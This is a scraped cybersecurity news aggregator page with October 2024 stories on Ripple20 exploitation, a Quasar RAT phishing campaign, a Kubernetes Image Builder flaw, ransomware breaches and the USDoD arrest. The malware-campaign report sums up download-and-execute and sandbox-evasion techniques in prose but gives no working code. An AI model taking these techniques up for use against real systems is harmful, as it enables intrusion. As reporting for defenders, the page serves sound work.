Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for Dumbest Thing in Sec ...

 Cyber News

Cyble’s weekly sensor report is an always fascinating look at the vulnerabilities that threat actors are actively exploiting. While new vulnerabilities are quickly exploited, older ones are still exploited with remarkable, if not alarming, frequency. Now before you go blaming grandpa for never updating that   show more ...

five-year-old Windows desktop, you’re not going to believe what is consistently the most exploited vulnerability. Or if you work in critical infrastructure cybersecurity, you might not be surprised by the answer. It’s not unusual to see this security vulnerability attacked more than 100,000 times in a given week, but this week Cyble sensors detected a jaw-dropping 411,000 attacks on this one vulnerability, showing that exploitation is growing dramatically over time. It’s getting worse, not better. The vulnerability is CVE-2020-11899, a four-year-old known vulnerability in the Treck TCP/IP stack that was developed as an IPv6 implementation for the limited space of embedded devices. That means there’s a good chance the flaw – which affects Treck TCP/IP versions before 6.0.1.66 – is present in any medical, industrial or critical infrastructure device that supports IPv6, and some consumer devices too. CVE-2020-11899 is an Out-of-bounds Read vulnerability rated a not-scary 5.4, but when used as part of the “Ripple20” series of vulnerabilities, it can lead to some Halloween levels of scariness. As Ripple20 discoverer JSOF put it: “...data could be stolen off of a printer, an infusion pump behavior changed, or industrial control devices could be made to malfunction. An attacker could hide malicious code within embedded devices for years. One of the vulnerabilities could enable entry from outside into the network boundaries; and this is only a small taste of the potential risks.” With potentially hundreds of millions of IoT, IIoT and embedded devices affected by the vulnerabilities, including some consumer devices, it’s a software supply chain vulnerability on steroids. CISA’s Ripple20 advisory – just updated last month – lists 17 prominent industrial, medical and critical infrastructure device manufacturers as potentially affected by the vulnerabilities. As those devices are also difficult to update, mitigations may be the best that many organizations can do to control risk in this case. We’ll look at what organizations can do to protect themselves from this very active exploit – along with the deplorable state of IoT security and hopes for improvement. The Most Exploited Vulnerability and IoT Security 2024 could mark a turning point for the better for IoT security, with the EU Cyber Resilience Act and the UK Product Security and Telecommunications Infrastructure (PSTI) Regulations taking effect and initiatives underway in several other countries, but the new rules and laws will do little for the millions, if not billions, of older devices that remain vulnerable and exposed to physical and cyber attacks. There are many reasons why IoT devices often harbor known vulnerabilities. Some have reached end-of-life (EOL) and are too integral or expensive to replace. Some must operate continuously, presenting daunting logistical challenges for patch management. Others are physically remote, or part of a vast network of different operating systems and configurations – many non-standard – that make updating nearly impossible. And some were never meant to be exposed to the internet, with connected functionality added as an afterthought. In a blog post yesterday, Lesley Carhart, director of incident response at OT/ICS security company Dragos, noted positive changes in operational technology awareness even as the challenges remain daunting. “We frequently see Windows 2003 or older operating systems,” Carhart wrote. “There is little ability to safely use modern forensic agents broadly in most environments. Everything centers around life and safety.” What might be most striking about Carhart’s post are the number of environments that have had known compromises for years. “We have seen an increase in customers with an interest in scoping and creating removal plans for long-term infections (think, 5-10 years) and architectural compromises of their industrial environments,” Carhart wrote. “Safe industrial operation requirements make it extremely challenging to do mass clean-up and reimaging efforts in process facilities. Many facilities have maintained a level of infection and compromise for years and deemed it too costly or high risk to conduct mitigation activities. However, these points of compromise can cause eventual operational and technical impact, in an unpredictable way. Interest has increased in understanding the scale of the problem and ‘projectizing’ removal in a safe way.” While Carhart sees the new awareness as positive, what’s troubling for those unfamiliar with OT security is how many have not only accepted the risk of unpatched devices, but may have also accepted the compromises that come with that. Whatever the reasons, there may be billions of internet-facing IoT devices with vulnerabilities – and possibly millions that are already infected. What’s an OT organization to do? IoT Security Practices and Controls There may be little an already-infected organization can do short of costly cleanup (if you’re in critical infrastructure, CISA may be able to offer free help), but there are steps that all organizations with critical IoT devices can take to limit damage and access. Start with an inventory of IoT devices so you’ll understand the scope of the problem. Patch where possible, and reach out to vendors for more information if needed. If a device doesn’t need to be exposed to the internet, make sure it isn’t, and disable any unnecessary ports, services and protocols. Carhart notes one major problem: “ineffective DMZ boundaries between Enterprise and OT.” That’s best fixed by strong network segmentation and microsegmentation, and “zero trust” policies that limit access and permissions to only that which a role requires. Segmentation can be done even within the OT network itself if some parts are more sensitive than others. The vast majority of IoT traffic is unencrypted, making that a control that should be high on most organizations’ priority list. Firewalls, intrusion detection, network monitoring and even VPNs are better controls than many have in place now. Default passwords and user names should be changed if they haven’t been, and multi-factor authentication (MFA) should be added wherever possible. JSOF’s initial advisory listed 31 vendors affected by Ripple20, including big names like Dell, Cisco and HP/HPE, so OT environments need to do an assessment of their own inventory. Tenable built a Nessus plugin based on scripts in JSOF’s work and whitepapers.

image for Analyzing a Multi-St ...

 Firewall Daily

Recent research by the Cyble Research and Intelligence Lab (CRIL) has brought to light a sophisticated multi-stage malware attack orchestrated by a Vietnamese threat actor. This campaign specifically targets job seekers and digital marketing professionals, employing various advanced tactics including the use of Quasar   show more ...

RAT, which allows attackers full control over compromised systems.   The attack appears to originate from spam emails that contain phishing attachments. These emails are designed to entice recipients into opening an archive file that houses an LNK file masquerading as a PDF document. The sequence of events begins with the execution of the LNK file, which carries PowerShell commands intended to download highly obfuscated scripts from external sources. This strategy aims to bypass traditional detection methods, particularly in non-virtualized environments.   The Quasar RAT Campaign by Vietnamese Threat Actor   Once the environment is verified to be free from analysis tools, the attackers decrypt the payload using hardcoded keys. This step activates Quasar RAT, enabling the threat actors to gain extensive access to the infected systems, facilitating data exfiltration, and the potential deployment of additional malware.   [caption id="attachment_91605" align="alignnone" width="626"] Execution flow of the campaign (Source: Cyble)[/caption] In July 2022, the Vietnamese threat actor intensified its operations by disseminating Ducktail malware specifically aimed at digital marketing professionals. The group later expanded its arsenal to include other types of malware, notably information stealers and remote access trojans (RATs). The attackers also leveraged Malware-as-a-Service (MaaS) frameworks to create more versatile and scalable campaigns.   This campaign is attributed to a Vietnamese threat group based on various indicators, including target selection, attack tools, and the delivery of malicious payloads," denoted CRIL. These elements align closely with tactics used in previous campaigns identified by cybersecurity experts, reinforcing the suspicion of organized cybercriminal activity.   The Mechanics of the Attack   The initial phase of the malware attack involves a malicious LNK file that executes PowerShell commands to download an additional script hosted on Dropbox. The specific link used for this operation is designed to execute the commands through the Invoke-Expression (IEX) and Invoke-RestMethod (irm) PowerShell commands.   Once the PowerShell script is executed, it decodes a lure PDF file and a batch file, storing them in the Downloads folder under the names "PositionApplied_VoyMedia.pdf" and "output.bat." The script then triggers these files using the Start-Process command.   The primary target of this sophisticated campaign appears to be professionals in the digital marketing, e-commerce, and performance marketing sectors, particularly those focused on Meta (Facebook, Instagram) advertising in the United States. The lure documents used in the attack have been crafted to appeal specifically to this demographic, increasing the likelihood of engagement.   Virtual Machine Evasion Techniques   One of the hallmark features of this multi-stage malware attack is its focus on evading detection by identifying whether it is operating within a virtual machine environment. The "output.bat" file employs Windows Management Instrumentation Command-line (WMIC) commands to ascertain the disk drive type and manufacturer, checking for signatures that indicate a virtual machine, such as “DADY HARDDISK” or manufacturers like "QEMU" and "VirtualBox."   If the environment is identified as virtual, the script exits to avoid detection. If not, it continues executing the obfuscated PowerShell script, effectively bypassing many security measures in place.   Decryption and Execution   The PowerShell script also includes a decryption phase where it extracts base64 encoded strings from the "output.bat" file. These strings undergo AES decryption using hardcoded keys, followed by decompression through a GZip stream. This process results in a .NET executable that runs in memory and conducts further detection-evasion checks.   Advanced Checks for Virtual Environments The malware employs an intricate series of checks to ascertain if it is running in a sandbox or virtual environment. These methods include:   Checking for specific file names related to virtualization software like VMware and Parallels.   Inspecting the presence of particular DLL modules that are characteristic of sandboxing solutions.   Measuring time discrepancies in system tick counts to detect emulated environments.   If any of these checks indicate a virtual or sandboxed environment, the malware triggers an exception, halting further execution to avoid detection.   Privilege Escalation and Persistence   Upon successful execution, the malware checks for administrative privileges. If the executable lacks these rights, it modifies its environment to gain elevated privileges using PowerShell commands or COM object invocations. Following privilege escalation, the malware copies itself to a hidden folder in the Windows directory and ensures it runs automatically on startup by modifying the Windows registry.   Defense Evasion Strategies   The malware’s evasion techniques extend beyond initial execution. It modifies key Windows functions to disable event tracing, thereby obscuring its presence from security monitoring tools. The malware also encrypts and compresses sensitive data, including its payload, to further disguise its operations.   Deployment of Quasar RAT   The final stage of the attack involves the execution of Quasar RAT, which has been adapted to reduce its detectability. This version of Quasar RAT is capable of executing a range of malicious tasks, including data theft and remote control of the infected system.   Quasar RAT is configured with various parameters, including specific host addresses, startup keys, and log directories, which are all integral to its operation. The modification of its attributes helps in avoiding attribution and detection, allowing the Vietnamese threat group to operate with greater anonymity. 

image for Microsoft: Daily Cyb ...

 Firewall Daily

Microsoft has revealed that its customers are subjected to over 600 million cybercriminals and nation-state cyberattacks daily. These threats encompass a broad spectrum of malicious activities, from ransomware and phishing to identity theft.    The recent findings in the fifth annual Microsoft Digital Defense   show more ...

Report highlight a troubling trend: nation-state actors are collaborating with cybercriminals, utilizing their tools and methods for various cyber operations, including espionage and influence campaigns.   The Rise of Nation-State Cyberattacks   Between July 2023 and June 2024, the report highlights how state-affiliated threat actors are leveraging cybercriminal networks for their own objectives. This collaboration is particularly evident in operations targeting Ukraine, where Russian actors have reportedly outsourced cyberespionage efforts to criminal groups. In June 2024, a cybercrime syndicate used widely available malware to infiltrate at least 50 Ukrainian military devices, showcasing the direct impact of nation-state cyberattacks on military security.   Iranian cyber operations have also adapted to the geopolitical climate, with state actors employing ransomware as a tool for influence. In one instance, Iranian hackers marketed stolen data from an Israeli dating site, offering to remove specific profiles for a fee. This melding of cybercrime with state objectives illustrates a new frontier in cyber operations, where financial gain and espionage intersect.   North Korea has entered the ransomware arena as well, with a newly identified actor developing a variant dubbed FakePenny. This ransomware was deployed against organizations in the aerospace and defense sectors, exemplifying a dual motive of intelligence gathering and profit. Geopolitical Context of Cyber Operations   The report emphasizes that nation-state cyberattacks are concentrated around active conflict zones and regions of political tension. In addition to the United States and the United Kingdom, cyber threats have been directed at Israel, Ukraine, the United Arab Emirates, and Taiwan.    For example, approximately 75% of Russian cyber operations targeted Ukraine or NATO member states, highlighting Moscow's interest in gathering intelligence on Western responses to its actions. Iran’s focus has intensified following the outbreak of the Israel-Hamas war, directing cyber resources towards Israel, the United States, and Gulf nations perceived as supportive of Israel.    Domestic Disruption and Election Interference   As geopolitical tensions rise, so does the threat of domestic disruption. Microsoft reports that Russia, Iran, and China are exploiting ongoing conflicts to create discord within the United States, particularly as the nation approaches a pivotal election. These state actors are seeking to influence public opinion and undermine confidence in the electoral process, employing tactics that range from propaganda to cyber operations designed to manipulate political narratives.   The rise of homoglyph domains—spoofed links often used for phishing—has surged, with Microsoft monitoring over 10,000 such threats aimed at impersonating legitimate entities. This indicates not only a rising tide of cybercriminal activity but also the strategic reconnaissance efforts by nation-state actors to achieve their political ends. Financially Motivated Cybercrime on the Rise   Despite the ominous threat posed by nation-state cyberattacks, financially motivated cybercrime remains a persistent concern. Over the past year, Microsoft documented a staggering 2.75-fold increase in ransomware attacks, although there was a notable decrease in incidents where attacks progressed to encryption stages. The primary tactics employed by these cyber criminals include social engineering, with email phishing remaining a predominant method.   Tech scams have experienced a dramatic surge of 400% since 2022, indicating a growing vulnerability in digital environments. With malicious infrastructure often remaining active for less than two hours, the rapid turnover emphasizes the need for dynamic and agile cybersecurity measures.   Both cybercriminals and nation-state actors are increasingly utilizing artificial intelligence to enhance their operations. While generative AI has the potential to increase cybersecurity responses, it is also being exploited to create more sophisticated phishing attacks and influence operations. For instance, actors linked to China are leveraging AI-generated imagery, while Russian affiliates are utilizing audio-focused AI.   The Path Forward: Collaboration and Deterrence   The staggering volume of attacks—over 600 million daily targeting Microsoft customers—highlights the urgent need for comprehensive and collaborative cybersecurity measures. Effective deterrence can be achieved through both denial of intrusions and imposing consequences for malicious behavior. Microsoft is committed to protecting its customers through initiatives like the Secure Future Initiative, which aims to enhance defense strategies.  To counteract the advantage currently held by cyber adversaries, both the public and private sectors must work together to establish and enforce international norms for behavior in cyberspace. While significant progress has been made in discussing these norms, meaningful consequences for violations are still lacking. Strengthening these frameworks will be essential in reducing the volume and aggression of nation-state cyberattacks. 

image for Critical Vulnerabili ...

 Firewall Daily

A new security risk has emerged in the Kubernetes Image Builder, posing a critical threat to organizations that utilize this tool for managing their containerized environments. The Kubernetes Image Builder vulnerability tracked as CVE-2024-9486, has been assigned a CVSS score of 9.8, indicating its severity.    If   show more ...

exploited, this vulnerability in Kubernetes Image Builder could allow unauthorized users to gain root access to nodes under specific circumstances, creating potential chaos in affected systems.   Overview of the Kubernetes Image Builder Vulnerability Discovered by security researcher Nicolai Rybnikar, this critical flaw allows default credentials to remain enabled during the image-building process. Joel Smith from Red Hat elaborated on the issue, stating, "A security issue was discovered in the Kubernetes Image Builder where default credentials are enabled during the image build process.    Additionally, virtual machine images built using the Proxmox provider do not disable these default credentials, which means that nodes using these images may be accessible through these credentials."   The implications of this vulnerability in Kubernetes Image Builder is profound. Clusters that use virtual machine images built with the Image Builder project and its Proxmox provider are at risk, as these images may provide attackers with the necessary credentials to gain root access. This can lead to unauthorized control over the nodes, impacting the integrity and security of the entire Kubernetes cluster.   Affected Versions The Kubernetes Image Builder vulnerability specifically affects versions 0.1.37 and earlier. Clusters utilizing these versions with the Proxmox provider are particularly susceptible. In contrast, images built with other providers do not share this vulnerability, although related issues may exist (as referenced in issue #128007). With a critical CVSS score of 9.8, this vulnerability in Kubernetes Image Builder can have severe implications, affecting not just the immediate security of clusters but also their operational integrity. Organizations are urged to update to the latest version of the Image Builder, implement recommended mitigation strategies, and continuously monitor their systems to protect against potential threats. Mitigation Steps Organizations must take proactive measures to address the Kubernetes Image Builder vulnerability. First and foremost, it is crucial to rebuild any affected images using a patched version of the Image Builder.    Version 0.1.38 rectifies the vulnerability and introduces two significant changes: it sets a randomly generated password for the duration of the image build and disables the builder account upon completion.   In the interim, organizations can mitigate the risk by disabling the builder account on affected virtual machines. This can be done by executing the command usermod -L builder.   For ongoing security, administrators should routinely check for any logins to the builder account. They can do this by using the command last builder.   If evidence of exploitation is discovered, it is important to report it immediately to security@kubernetes.io. Taking these steps will help organizations protect their environments against potential threats.   Conclusion The CVE-2024-9486 vulnerability in the Kubernetes Image Builder highlights the critical importance of maintaining better security practices in containerized environments. With a CVSS score of 9.8, this vulnerability poses a risk, particularly for organizations using affected versions with the Proxmox provider.    Immediate action is essential: upgrading to version 0.1.38 is a necessary step to safeguard systems from unauthorized access and potential chaos. Additionally, implementing the recommended mitigation strategies and conducting regular security audits will help protect defenses against this and future vulnerabilities.

image for Global Crackdown on ...

 Firewall Daily

Law enforcement agencies have revealed a massive crackdown on illegal football gambling, resulting in over 5,100 arrests and the recovery of more than USD 59 million in illicit proceeds.   This operation, known as SOGA X, was executed from June to July 2024 and involved a collaborative effort from INTERPOL alongside   show more ...

28 countries and territories. The timing of the operation was strategic, coinciding with the UEFA 2024 European Football Championship, a period expected to see an increase in betting activities, particularly from organized crime groups profiting from illegal football gambling.  The Scale of Illegal Football Gambling The global illegal gambling market is estimated to be worth a staggering USD 1.7 trillion, according to research from the Asian Racing Federation. This shadowy sector is often intertwined with various forms of criminal activity, including human trafficking, money laundering, and fraud. The SOGA X operation not only targeted illegal online football gambling but also aimed to dismantle the networks supporting these criminal enterprises, highlighting the extensive connections between sports betting and broader criminal activities.  During this operation, authorities successfully shut down thousands of illegal gambling websites and initiated investigations that led to the rescue of trafficked individuals and the exposure of sophisticated money laundering schemes. For instance, a notable case in the Philippines saw local authorities, with INTERPOL's assistance, dismantle a scam center linked to a licensed gambling operation.  Human Trafficking Victims Rescued In the Philippines, the SOGA X operation resulted in the rescue of over 650 human trafficking victims, comprising nearly 400 Filipinos and more than 250 foreign nationals from six different countries. Many of these individuals were misled into believing they had secured legitimate employment, only to find themselves trapped through threats and intimidation. They were forced to work for the legal gambling site while simultaneously managing illegal cyber scams, such as romance fraud and cryptocurrency-related schemes.  An INTERPOL Operational Support Team played a crucial role in this operation, providing expertise in extracting and analyzing forensic evidence from seized devices. Their efforts were instrumental in tracing illicit financial flows and identifying victims and suspects across different jurisdictions.  Significant Arrests Across Asia The reach of SOGA X extended beyond the Philippines. In Vietnam, where online gambling is illegal for citizens, authorities dismantled a complex gambling ring that processed an astonishing USD 800,000 in daily transactions. This syndicate utilized servers located in various countries, employing an intricate network of bank accounts and e-wallets to facilitate illegal betting and payouts.  In Thailand, police conducted raids on two major illegal betting sites, leading to the arrest of key ringleaders. They also seized assets valued at over USD 9 million. Similarly, in Greece, law enforcement agencies took down an organized crime group that manipulated the betting landscape using fake accounts. This group managed a staggering 3,000 fake and "mule" accounts on legal gambling platforms across Greece, Cyprus, and Spain, employing stolen identity documents and sophisticated techniques to disguise their operations.  Interconnected Criminal Activities  SOGA X was a coordinated effort with INTERPOL, with vital support from various international organizations, including the Asia-Pacific Expert Group on Organized Crime (APEG) and the INTERPOL Match Fixing Task Force (IMFTF). Stephen Kavanagh, INTERPOL's Executive Director of Police Services, emphasized the importance of global information sharing in combating the intricate networks of organized crime.   Organized crime networks reap huge profits from illegal gambling, which is often intertwined with corruption, human trafficking, and money laundering," he stated. The implications of illegal football gambling extend beyond mere financial loss; they are also closely linked to match-fixing, where criminals manipulate sports outcomes to secure guaranteed profits. The ongoing investigations from SOGA X aim to disrupt these manipulative practices and uphold the integrity of sports.  Conclusion Operation SOGA X saw participation from a diverse array of countries, including Australia, Belgium, Greece, Vietnam, and more. Each jurisdiction contributed to a collective effort to combat the rising tide of illegal gambling activities that threaten to undermine the integrity of sports and public safety.  As investigations continue, the ramifications of this operation are likely to resonate throughout the global landscape of online gambling. Law enforcement agencies are not only focusing on immediate arrests but also on dismantling the underlying infrastructure that supports illegal football gambling. 

image for Boston Children’s ...

 Cyber News

Boston Children’s Health Physicians (BCHP), a multi-specialty healthcare group providing pediatric care across Connecticut and New York, recently notified patients and staff of a significant data breach following a cyberattack. The BCHP cyberattack, which stemmed from an IT vendor's systems, compromised   show more ...

sensitive information belonging to current and former employees, patients, and guarantors. The healthcare organization, which employs over 300 clinicians, emphasized that it quickly responded to the incident, implementing its incident response protocols as soon as the breach was discovered. Timeline of the BCHP Cyberattack The cyberattack on BCHP occurred on September 6, 2024, when BCHP's IT vendor identified unusual activity on its systems. Four days later, on September 10, BCHP discovered that an unauthorized third party had gained access to parts of its network. This unauthorized party managed to exfiltrate certain files from the organization's network, triggering a swift response. BCHP immediately shut down its systems as a precautionary measure and launched an investigation with the help of a third-party forensic firm. The healthcare provider has since taken steps to enhance the security of its systems and prevent further incidents of this nature. However, the damage had already been done, with files containing sensitive information being compromised during the breach. Data Exposed in the BCHP Data Breach The compromised files contained a wide range of sensitive data, including names, Social Security numbers, billing details, addresses, driver’s license numbers, medical record numbers, and health insurance information. The BCHP data breach affected not only patients but also current and former employees, as well as guarantors linked to the organization. While BCHP confirmed that its electronic health records (EHR) were on a separate network and remained unaffected by the cyberattack, the breadth of the exposed data is significant. The organization has since begun notifying affected individuals and has offered complimentary credit monitoring and protection services to those whose Social Security or driver’s license numbers were involved in the breach. BianLian Group Claims Responsibility The BianLian cyberthreat group, a well-known ransomware gang, has claimed responsibility for the BCHP cyberattack. This group has been linked to several high-profile cyberattacks targeting critical infrastructure. In May 2023, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) issued a joint alert warning entities about BianLian’s methods and the potential consequences of falling victim to their ransomware campaigns. [caption id="attachment_91553" align="aligncenter" width="1024"] Source: X[/caption] BianLian has been particularly active in 2024, with data from cybersecurity research firm Comparitech indicating the group has claimed responsibility for 60 confirmed ransomware attacks this year alone. In BCHP’s case, the group allegedly exfiltrated the stolen files and may have demanded a ransom to prevent the further dissemination of the compromised data. However, BCHP has not publicly commented on any ransom demands or whether it engaged with the cybercriminals. BCHP's Response and Next Steps In a public statement posted on its website, BCHP acknowledged the breach and detailed the steps it is taking to mitigate its impact. According to the statement, the organization began notifying affected individuals via mail starting on October 4, 2024. BCHP has also set up a dedicated toll-free hotline to address concerns and answer questions from those potentially affected. BCHP encouraged individuals whose information was compromised to monitor their healthcare billing statements and report any unauthorized charges to their insurers immediately. For those affected, particularly those whose sensitive personal information was involved, the organization has offered complimentary credit monitoring and credit protection services. To further strengthen its cybersecurity posture, BCHP has implemented additional safeguards designed to protect and monitor its systems against future cyberattacks. The healthcare provider has not revealed the specific measures but noted that the investigation into the breach is ongoing.

image for Brazil Arrests ‘US ...

 A Little Sunshine

Brazilian authorities reportedly have arrested a 33-year-old man on suspicion of being “USDoD,” a prolific cybercriminal who rose to infamy in 2022 after infiltrating the FBI’s InfraGard program and leaking contact information for 80,000 members. More recently, USDoD was behind a breach at the   show more ...

consumer data broker National Public Data that led to the leak of Social Security numbers and other personal information for a significant portion of the U.S. population. USDoD’s InfraGard sales thread on Breached. The Brazilian news outlet TV Globo first reported the news of USDoD’s arrest, saying the Federal Police arrested a 33-year-old man from Belo Horizonte. According to TV Globo, USDoD is wanted domestically in connection with the theft of data on Brazilian Federal Police officers. USDoD was known to use the hacker handles “Equation Corp” and “NetSec,” and according to the cyber intelligence platform Intel 471 NetSec posted a thread on the now-defunct cybercrime community RaidForums on Feb. 22, 2022, in which they offered the email address and password for 659 members of the Brazilian Federal Police. TV Globo didn’t name the man arrested, but the Portuguese tech news outlet Tecmundo published a report in August 2024 that named USDoD as 33-year-old Luan BG from Minas Gerais, Brazil. Techmundo said it learned the hacker’s real identity after being given a draft of a detailed, non-public report produced by the security firm CrowdStrike. CrowdStrike did not respond to a request for comment. But a week after Techmundo’s piece, the tech news publication hackread.com published a story in which USDoD reportedly admitted that CrowdStrike was accurate in identifying him. Hackread said USDoD shared a statement, which was partially addressed to CrowdStrike: A recent statement by USDoD, after he was successfully doxed by CrowdStrike and other security firms. Image: Hackread.com. In August 2024, a cybercriminal began selling Social Security numbers and other personal information stolen from National Public Data, a private data broker in Florida that collected and sold SSNs and contact data for a significant slice of the American population. Additional reporting revealed National Public Data had inadvertently published its own passwords on the Internet. The company is now the target of multiple class-action lawsuits, and recently declared bankruptcy. In an interview with KrebsOnSecurity, USDoD acknowledged stealing the NPD data earlier this year, but claimed he was not involved in leaking or selling it. In December 2022, KrebsOnSecurity broke the news that USDoD had social-engineered his way into the FBI’s InfraGard program, an FBI initiative designed to build informal information sharing partnerships with vetted professionals in the private sector concerning cyber and physical threats to critical U.S. national infrastructure. USDoD applied for InfraGard membership using the identity of the CEO of a major U.S. financial company. Even though USDoD listed the real mobile phone number of the CEO, the FBI apparently never reached the CEO to validate his application, because the request was granted just a few weeks later. After that, USDoD said he used a simple program to collect all of the contact information shared by more than 80,000 InfraGard members. The FBI declined to comment on reports about USDoD’s arrest. In a lengthy September 2023 interview with databreaches.net, USDoD told the publication he was a man in his mid-30s who was born in South America and who holds dual citizenship in Brazil and Portugal. Toward the end of that interview, USDoD said they were planning to launch a platform for acquiring military intelligence from the United States. Databreaches.net told KrebsOnSecurity USDoD has been a regular correspondent since that 2023 interview, and that after being doxed USDoD made inquiries with a local attorney to learn if there were any open investigations or charges against him. “From what the lawyer found out from the federal police, they had no open cases or charges against him at that time,” Databreaches.net said. “From his writing to me and the conversations we had, my sense is he had absolutely no idea he was in imminent danger of being arrested.” When KrebsOnSecurity last communicated with USDoD via Telegram on Aug. 15, 2024, they claimed they were “planning to retire and move on from this,” referring to multiple media reports that blamed USDoD for leaking nearly three billion consumer records from National Public Data. Less than four days later, however, USDoD was back on his normal haunt at BreachForums, posting custom exploit code he claimed to have written to attack recently patched vulnerabilities in a popular theme made for WordPress websites.

image for Time to Get Strict W ...

 Feed

Adoption of the email authentication and policy specification remains low, and only about a tenth of DMARC-enabled domains enforce policies. Everyone is waiting for major email providers to get strict.

 Feed

This Metasploit module uses a combination of an arbitrary file read (CVE-2024-34102) and a buffer overflow in glibc (CVE-2024-2961). It allows for unauthenticated remote code execution on various versions of Magento and Adobe Commerce (and earlier versions if the PHP and glibc versions are also vulnerable). Versions   show more ...

affected include 2.4.7 and earlier, 2.4.6-p5 and earlier, 2.4.5-p7 and earlier, and 2.4.4-p8 and earlier.

 Feed

Ubuntu Security Notice 7028-2 - It was discovered that the JFS file system contained an out-of-bounds read vulnerability when printing xattr debug information. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

 Feed

Ubuntu Security Notice 7059-2 - USN-7059-1 fixed a vulnerability in OATH Toolkit library. This update provides the corresponding update for Ubuntu 24.10. Fabian Vogt discovered that OATH Toolkit incorrectly handled file permissions. A remote attacker could possibly use this issue to overwrite root owned files, leading to a privilege escalation attack.

 Feed

Red Hat Security Advisory 2024-8116-03 - An update for java-1.8.0-openjdk is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support. Issues addressed include buffer overflow and integer overflow vulnerabilities.

 Feed

Picture your company's data as a vast, complex jigsaw puzzle—scattered across clouds, devices, and networks. Some pieces are hidden, some misplaced, and others might even be missing entirely. Keeping your data secure in today’s fast-evolving landscape can feel like an impossible challenge. But there’s a game-changing solution: Data Security Posture Management (DSPM). Think of it as a high-tech,

 Feed

Cybersecurity and intelligence agencies from Australia, Canada, and the U.S. have warned about a year-long campaign undertaken by Iranian cyber actors to infiltrate critical infrastructure organizations via brute-force attacks. "Since October 2023, Iranian actors have used brute force and password spraying to compromise user accounts and obtain access to organizations in the healthcare and

 Feed

Threat actors are leveraging fake Google Meet web pages as part of an ongoing malware campaign dubbed ClickFix to deliver infostealers targeting Windows and macOS systems. "This tactic involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell code, finally infecting their systems," French cybersecurity company Sekoia said in

 Feed

Microsoft has disclosed details about a now-patched security flaw in Apple's Transparency, Consent, and Control (TCC) framework in macOS that has likely come under exploitation to get around a user's privacy preferences and access data. The shortcoming, codenamed HM Surf by the tech giant, is tracked as CVE-2024-44133 (CVSS score: 5.5). It was addressed by Apple as part of macOS Sequoia 15 by

2024-10
Aggregator history
Friday, October 18
TUE
WED
THU
FRI
SAT
SUN
MON
OctoberNovemberDecember